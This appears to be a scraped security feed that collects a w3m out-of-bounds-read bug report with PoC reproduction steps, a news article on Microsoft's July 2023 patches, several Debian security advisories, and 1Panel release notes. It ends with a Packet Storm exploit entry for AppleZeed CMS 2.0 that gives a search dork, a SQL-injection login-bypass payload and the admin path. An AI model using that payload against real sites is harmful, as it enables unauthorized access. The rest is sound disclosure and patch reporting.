An out-of-bounds read flaw was found in w3m, in the Strnew_size function in Str.c. This issue may allow an attacker to cause a denial of service through a crafted HTML file.

Hello, I found a out-of-bound read in w3m, function Strnew\_size , Str.c:61 while testing my new fuzzer.

**Steps to reproduce**

    export CC=gcc
    export CFLAGS="-fsanitize=address -g"
    ./configure && make -j
    ./w3m -dump $POC
    

Dockerized reproduce steps (recommended)

    docker pull debian:11 && docker run -it debian:11 bash
    ## now step into the container
    apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y
    git clone https://github.com/tats/w3m && pushd w3m
    export CC="gcc -fsanitize=address -g" && ./configure && make -j
    wget https://github.com/tats/w3m/files/11905204/poc1.zip && unzip poc1.zip
    ./w3m -dump ./poc1
    

**Platform**

*   OS: Debian 11

    $ cat /etc/issue
    Debian GNU/Linux 11 \n \l
    

*   w3m latest commit 93ad5ee

    $ ./w3m -version 
    w3m version w3m/0.5.3+git20230129, options lang=en,m17n,image,color,ansi-color,mouse,menu,cookie,external-uri-loader,w3mmailer,nntp,gopher,ipv6,alarm,mark
    

**ASAN**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==85==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f147749b742 bp 0x000000000080 sp 0x7ffddcd7c740 T0)
    ==85==The signal is caused by a READ memory access.
    ==85==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
        #0 0x7f147749b742 in GC_malloc_kind_global (/usr/lib/x86_64-linux-gnu/libgc.so.1+0x19742)
        #1 0x5639c506e050 in Strnew_size /w3m/Str.c:61
        #2 0x5639c507a2fb in wc_conv_to_ces /w3m/libwc/conv.c:70
        #3 0x5639c4fbde57 in _saveBuffer /w3m/file.c:7875
        #4 0x5639c4f6cb97 in do_dump /w3m/main.c:1409
        #5 0x5639c4f65a4d in main /w3m/main.c:1115
        #6 0x7f14772a2d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
        #7 0x5639c4f69979 in _start (/w3m/w3m+0xb3979)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libgc.so.1+0x19742) in GC_malloc_kind_global
    ==85==ABORTING
    

**POC**

poc1.zip

CVE-2023-38252: [BUG] Out of bound read in Strnew_size , Str.c:61 · Issue #270 · tats/w3m

Microsoft on Tuesday released updates to address a total of 130 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild.
Of the 130 vulnerabilities, nine are rated Critical and 121 are rated Important in severity. This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of

Vulnerability / Software Security

Microsoft on Tuesday released updates to address a total of 130 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild.

Of the 130 vulnerabilities, nine are rated Critical and 121 are rated Important in severity. This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of last month.

The list of issues that have come under active exploitation is as follows -

*   **CVE-2023-32046** (CVSS score: 7.8) - Windows MSHTML Platform Elevation of Privilege Vulnerability
*   **CVE-2023-32049** (CVSS score: 8.8) - Windows SmartScreen Security Feature Bypass Vulnerability
*   **CVE-2023-35311** (CVSS score: 8.8) - Microsoft Outlook Security Feature Bypass Vulnerability
*   **CVE-2023-36874** (CVSS score: 7.8) - Windows Error Reporting Service Elevation of Privilege Vulnerability
*   **CVE-2023-36884** (CVSS score: 8.3) - Office and Windows HTML Remote Code Execution Vulnerability (Also publicly known at the time of the release)
*   **ADV230001** - Malicious use of Microsoft-signed drivers for post-exploitation activity (no CVE assigned)

The Windows makers said it's aware of targeted attacks against defense and government entities in Europe and North America that attempt to exploit CVE-2023-36884 by using specially-crafted Microsoft Office document lures related to the Ukrainian World Congress, echoing the latest findings from BlackBerry.

"An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim," Microsoft said. "However, an attacker would have to convince the victim to open the malicious file."

The company has flagged the intrusion campaign to a Russian cybercriminal group it tracks as Storm-0978, which is also known by the names RomCom, Tropical Scorpius, UNC2596, and Void Rabisu.

"The actor also deploys the Underground ransomware, which is closely related to the Industrial Spy ransomware first observed in the wild in May 2022," the Microsoft Threat Intelligence team explained. "The actor's latest campaign detected in June 2023 involved abuse of CVE-2023-36884 to deliver a backdoor with similarities to RomCom."

Recent phishing attacks staged by the actor have entailed the use of trojanized versions of legitimate software hosted on lookalike websites to deploy a remote access trojan called RomCom RAT against various Ukrainian and pro-Ukraine targets in Eastern Europe and North America.

While RomCom was first clocked as a group tied to Cuba ransomware, it has since been linked to other ransomware strains such as Industrial Spy as well a new variant called Underground as of July 2023, which exhibits significant source code overlaps with Industry Spy.

Microsoft said it intends to take "appropriate action to help protect our customers" in the form of an out-of-band security update or via its monthly release process. In the absence of a patch for CVE-2023-36884, the company is urging users to use the "Block all Office applications from creating child processes" attack surface reduction (ASR) rule.

Redmond further said it revoked code-signing certificates used to sign and install malicious kernel-mode drivers on compromised systems by exploiting a Windows policy loophole to alter the signing date of drivers before July 29, 2015, by making use of open-source tools like HookSignTool and FuckCertVerifyTimeValidity.

The findings suggest that the use of rogue kernel-mode drivers is gaining traction among threat actors as they operate at the highest privilege level on Windows, thereby making it possible to establish persistence for extended periods of time while simultaneously interfering with the functioning of security software to evade detection.

UPCOMING WEBINAR

🔐 PAM Security – Expert Solutions to Secure Your Sensitive Accounts

This expert-led webinar will equip you with the knowledge and strategies you need to transform your privileged access security strategy.

Reserve Your Spot

It's not currently not clear how the other flaws are being exploited and how broadly those attacks are spread. But in light of active abuse, it's recommended that users move quickly to apply the updates to mitigate potential threats.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple (it has since been pulled)
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Progress MOVEit Transfer
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   VMware
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Patches for 130 Vulnerabilities, Including 6 Under Active Attack

Debian Linux Security Advisory 5451-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5451-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 09, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207  
                 CVE-2023-37208 CVE-2023-37211  
Debian Bug     : 971790 1006432

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:102.13.0-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:102.13.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSq/IEACgkQEMKTtsN8  
TjbbzA//RGC3Tj6WRrccthY5Uxh30CLYzuGvJmlwzd4iH80/8cXZi4dbPu0bSFnP  
wA6qjtNxxeCFcc711699O9LqVGQUBzyK23hp012yHtPb4zjnWwkhZ7FqyZCvgx9d  
H06rtsuOAr2PBlS4bcW3NQy9fH1xMom/+blW6L4IejQ3jXJXmT6B/xZxo0aj39bE  
qNZXxtBWLdiIzVDjXbR7TMT9J+UkvTxyNTXKjf6d3u34LfEIfiHHE8vfZB+JCwwn  
17I8/nsecJglQHXpIu7dNfDNqLmLJPrceBl1R3XMHmA3uQLqQMypT5nsPdWpiMOW  
kOvgmE6jrUUcR7mgQsTcxqD6B5QEztEvOpaRrA7MB5geWewd8E4deksvGwv5Tr9R  
coBM2lzbLRrnbcki83qTjNX8D7B7Urs+uU3YIp/TNSwmaiLIXgwxu7CyzLUif6+7  
+n3GPSMski64qc6WJ0cPajQAmdX2pwtWmyYne5mcKpC3iujj/fQTpZ+Qf5Yuhs/K  
jAd+xqwOXpbEMrCwWBssy92Nj8vWkT2T4vIco1QRxKy3TSBkwubjigZSorKFIx6v  
39a4AeknI0HuH4E3oJ8E6+Um9miptZB4jswlRSRDay7H1AX6bVfs1Bi0L1pozNG6  
lfcugCF+TPFaLRBcBEK3dD4ch47x98rE9bOEZr2ITT2JuP+A1cE=  
=SqjJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5451-1

Debian Linux Security Advisory 5450-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5450-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 07, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207 CVE-2023-37208   
                 CVE-2023-37211

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code or spoofing.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.13.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.13.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSoTqMACgkQEMKTtsN8  
Tjb94A/7BrYQvYvuqkqEi7jG9+SLWXR3DeT+FE9Pkt23nPf0W/6zq0BE1lPt2csU  
wOL5Gu4fJuoWIDoQWeVMhYqapAZqxxkzSctV2JVOW7J5sf+gfsGBvKZ+yUAKX6AJ  
V7AoEAi2yUrWWFNVBiViJXLFeoe6UK/gxGDRu9MCfIM2JguMEguLVz3pIQlPgyrv  
87BPgMHHrcYalu8YBAH5SCeskXaCmXP1NkQ0juZZE8Rorfy9k44jTw6gqUCidmbJ  
hzL2lj035LU+IXKMVO2azGwnLHPQu1wbX7THQXUVSU0uov0WVEXqtf4QJd/ETnSx  
syJKPxXL8xOdL7pM/DIsOfg1mkVogsWS/CVYfU/ain/v0l9lyn5lN0nsIJwHO670  
hY/IM+d3Juz2kjmQ3cF7KcxCi3G7aYxzwvTBpCFGdjGvJ5Tj4RlMfuLgkk+bvZty  
eD2DXQSmQUcWzLjRLz/rz0wBix+76z2fVvOZSBK/SR699kHNs3dLA9AdnbLOig2q  
Dc/FYHT9E/QphcHrKiZhroZFp4wcAsqh3Jm4qG8J7UEc0MApG3f8ct+J/B24MHqn  
F+6UOA/8lGG45uVrdhhKswvN0NrDn5Fv3mreE6DiIr5V2m9fdiQLE6IDctnk+bec  
QsEoFM8xGLaEJWrbJ4KFbzwy0ss8xlbuTEsGvEP0Zp8Xq30Is7U=  
=A7kU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5450-1

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

Debian Linux Security Advisory 5448-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5448-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 05, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-2124 CVE-2023-2156 CVE-2023-2269 CVE-2023-3090  
                 CVE-2023-3212 CVE-2023-3268 CVE-2023-3269 CVE-2023-3390  
                 CVE-2023-31084 CVE-2023-32250 CVE-2023-32254 CVE-2023-35788

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2156

    It was discovered that the IPv6 RPL protocol implementation in the  
    Linux kernel did not properly handled user-supplied data, resulting  
    in a triggerable assertion. An unauthenticated remote attacker can  
    take advantage of this flaw for denial of service.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3269

    Ruihan Li discovered that incorrect lock handling for accessing and  
    updating virtual memory areas (VMAs) may result in privilege  
    escalation.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-32250 / CVE-2023-32254

    Quentin Minster discovered two race conditions in KSMBD, a kernel  
    server which implements the SMB3 protocol, which could result in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-35788

    Hangyu Hua discovered an out-of-bounds write vulnerability in the  
    Flower classifier which may result in denial of service or the  
    execution of arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.37-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSlxzBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TqhA//aamUmnSElduaBWsCIn+Bbz1QeZgUqeAtdLVyAR8DHhWOW5CQtaIYAGCN  
bH8zYl4DULQNoWccNJKAB6mmh+eLK74L4W9Kkd4C3HL2g2CACDijoO79BlOE35VW  
33/S+bhg5gzC1qyv5A6HKt9QltyIA6cI9B+WPPG+uA79T/+12mWI7XbGUYiOaNeR  
WgOFK8iOhg7KemZqUFsbsG4qRGN0fzGHsU8KOLmF83hP6ObbPZKvVIdRHm0z7ff1  
Xba6El+i75LRx0Fqv6tQ3pZE43blXJZIlesUw1M44U493FINmUNTpPAkbJPlHbOb  
zBC61YcNiPhzyDu2bux+fyoNIfZxh4u9THm8SqWz5mejIFcjGgA9tNsQE3o9c1q/  
bZ/QyWoYYOCNBUeLTfOOHuTLlxK7HslTIp4A7J2uLrUiTrmPXldXmIl0FsFc4l+8  
qkBaZ+p58XbB7K02VIkr39gFx90GbF+Na0AaUoPGPyQBLz0X87uY6FyOCBY/SbyU  
3ARTQT4O55jX+zgK7cUasrS/jVIDEczMIWkf0yHbL4a6ihiNc2Isc1s0gjTF26ji  
AAE3BdIXi/V+CU4pHX8uq9BVwrDT0rm5BLgLJEo7n/oAWg6Tiq77TGOovQ1mgqF1  
TTCY/41xmwkD9UflCu5gdq7jyIqDKPBxjemTZuMhoztQXL9D9tI=MBf4  
-----END PGP SIGNATURE-----

Debian Security Advisory 5448-1

Debian Linux Security Advisory 5447-1 - Multiple security issues were discovered in MediaWiki, a website engine for collaborative work, which could result in cross-site scripting, a bypass of vandalism protections or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5447-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 05, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : CVE-2023-29141 CVE-2023-36674 CVE-2023-36675Debian Bug     : 1039075Multiple security issues were discovered in MediaWiki, a website enginefor collaborative work, which could result in cross-site scripting, abypass of vandalism protections or information disclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 1:1.35.11-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:1.39.4-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSlqxIACgkQEMKTtsN8TjbJRBAAodt+4EzI/HLq3hr2OU6K3WE6W2ThrPSMNev0TLyCTw7GeX4avi3cKjNLwqdPWGE4BjC6YAb5qU6Z9rqL00megvqihL5kaf010++jXk1/9uruENkOSj+KJuWtqLIvX3MYH4EU5gLRD6we8+LzTJQX46UNXtUVSQ7ixZNegzWGbZ8usI046x3YwAHVMTf5tn3M/XBKdhd9UcvffB+qM4Dkyyr1+/tJXyIzxYq8RbHDFW8ggvKZTJ1xSXVY4G0G4k+kQEvWtyUvIzypj5hdAI2zzSUXstFKl64dMwS35hXq8HrORJZwYVTgmLw56D346wYr5SelP++NO5Ap+nGmjc4bn3UxAMnc6EvCKC5L9nO8dYviMMe7EyLqyKhdrPXJXV0c+Yxznn3SRh9iRoVXwkfEmE+JT562qvk3ozu548AH8NzRaCEdv7DzuxhgBSrZMbOozDTmMiEUbe7beKfhSwo8tpRqlVlcA4Pk+v2TnEE6sQN6+gwrLaOyv7N9zwlofFHrjMyR68oFyNg9+cWhuLpca+NUjJE1mzk7V+2ehh1bH83YNAeStYqYqgK1oJcKNS/xVhCOm246TOwCROw5FwO7oZTYy44BUXrMZh+t/Srf2ko7lsYlPLWoz8t0gfZ47YMraeNoiewkq7Ij8RvhL/ZKOlB45MHlWewh0KR97HwItOE=1rTe-----END PGP SIGNATURE-----

Debian Security Advisory 5447-1

1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. The vulnerability has been fixed in v1.3.6.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 功能优化**

*   应用商店列表增加分页显示。 by @zhengkunwang223 in #1447
*   SSH 登录日志列表查询逻辑优化。 by @ssongliu in #1435

**2.2 问题修复**

*   修复了由于 docker 版本低导致应用无法正常操作的问题。 by @zhengkunwang223 in #1446
*   修复了执行备份根目录文件夹计划任务失败的问题。 by @ssongliu in #1444
*   修复了系统数据库文件无法正常读写时系统提示错误的问题。 by @ssongliu in #1438
*   修复了添加镜像仓库和进入容器终端存在命令注入的问题。 by @ssongliu in #1443
*   修复了设置容器镜像加速和私有仓库时由于空行导致 docker 无法正常启用的问题。 by @ssongliu in #1437

CVE-2023-36457: Release v1.3.6 · 1Panel-dev/1Panel

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#debian